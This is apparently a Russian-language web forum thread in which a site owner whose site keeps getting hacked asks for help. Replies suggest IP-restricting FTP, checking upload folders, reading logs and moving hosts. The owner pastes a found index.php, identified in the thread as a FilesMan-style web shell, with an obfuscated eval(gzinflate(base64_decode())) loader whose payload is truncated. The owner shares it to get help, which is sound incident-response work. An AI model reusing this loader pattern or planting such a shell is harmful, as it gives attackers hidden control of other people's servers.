Сайт взломали, помогите!

Если есть щелл и и хост позволяет, то ограничения на фтп бесполезны.

можно поподробней?

У меня вот есть свой VPS сервер, и я там просто напросто для всего FTP(конкретно для всего демона) запретил доступ со всех адресов, кроме моего, да и в принципе так же сделал для ssh, mysql(тока там еще нужно ip адрес сервака прописать, а то сам к себе не сможет подключится) и не парюсь по этому поводу... бери себе vps и живи счастливо! :)

Если у вас уже есть вирус, то хоть закрывай доступ, хоть нет - он будет дальше "работать". Посмотрите все папки. Я вот недавно в папке Uploads нашел уйму интересно, включая закодированный левый index.php

в общем, вредоносный код я удалил, пароли сменил, но не думаю, что проблема решена.

У хостера нет возможности открыть доступ только для выборочных ip, хотя эта идея мне очень понравилась. А по поводу shell, я запретил его в cpanel. (никогда не пользовался).

Может есть смысл сменить хостера, чтобы сделать запрет на ftp?

дааааааааа сделай запрет

только что опять взломали, дак что? менять хостера? подскажите куда переезжать тогда

Перезжать туда где можно закрыть ФТП от всех

нашел в подкаталоге файл index.php следующего содержания, это могло быть проблемой?

<?php

$auth_pass = "d61875a33e449c5c705e71b50a57cdd6";

$color = "#df5";

$default_action = 'FilesMan';

$default_use_ajax = true;

$default_charset = 'Windows-1251';

preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'5b1pdxrHEjD82fec+x9aE24GYoQA2bkOEli2LNlybMnR4lV+yAADTDQwZGYQkh3996eqepnuWRCyk/u......................................6hJN6vv+H4XL9FdLFUEiippqKn6fwE='\x29\x29\x29\x3B",".");?>

Логи надо смотреть, а не заморачиваться по поводу троянов и фтп.

Посмотрел логи > Выявил суть проблемы > Решил.

А не гипотезы выдвигать и лишние телодвижения делать.

Может быть вообще сервер порутан :)

Пыщь пыщь

Это шелл от oRb'a